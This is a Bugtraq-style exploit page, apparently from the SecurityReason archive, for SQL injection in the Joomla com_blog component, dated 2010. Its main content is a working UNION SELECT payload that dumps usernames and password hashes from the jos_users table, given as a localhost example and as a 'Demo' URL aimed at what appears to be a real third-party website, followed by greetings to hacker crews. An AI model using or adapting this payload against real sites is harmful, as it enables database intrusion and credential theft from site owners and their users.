|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  World Laboratory of Bugtraq Database |
||||||||||
SecurityAlert : None
Credit : DevilZ TM SecurityRisk : Medium  (About) Remote : Yes Local : No Status : Bug
Text : # Title : Joomla Component com_blog Remote SQL Injection # Author: # Data : 2010-03-14 [~]######################################### InformatioN #############################################[~] [~] Title : Joomla Component com_blog Remote SQL Injection [~] Author : DevilZ TM By D3v1l [~] Homepage : http://www.DEVILZTM.com [~] Contact : DevilZTM@Gmail.CoM & D3v1l.blackhat@yahoo.com [~]######################################### ExploiT #################################################[~] [~] Vulnerable File : http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=[SQL ] [~] ExploiT : -1/**/UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/* [~] Example : http://127.0.0.1/index.php?option=com_blog&task=viewdetails&id=-1/* */UNION/**/SELECT/**/1,2,3,4,5,6,7/**/FROM/**/jos_users/* [~] Demo : http://www.banaonline.org/index.php?option=com_blog&task=viewdetails&am p;id=-1/**/UNION/**/SELECT/**/1,2,3,concat(username,0xa,password),5,6,7/**/ FROM/**/jos_users/* [~]######################################### ThankS To ... ############################################[~] [~] Special Thanks To My Best FriendS : Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS [~] IRANIAN Young HackerZ [~]######################################## FinisH :D #################################################[~] Audyt bezpieczeństwaSecurity AuditAnaliza powłamaniowa References : None If you want change this note, please use UCP
|
||||||||||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |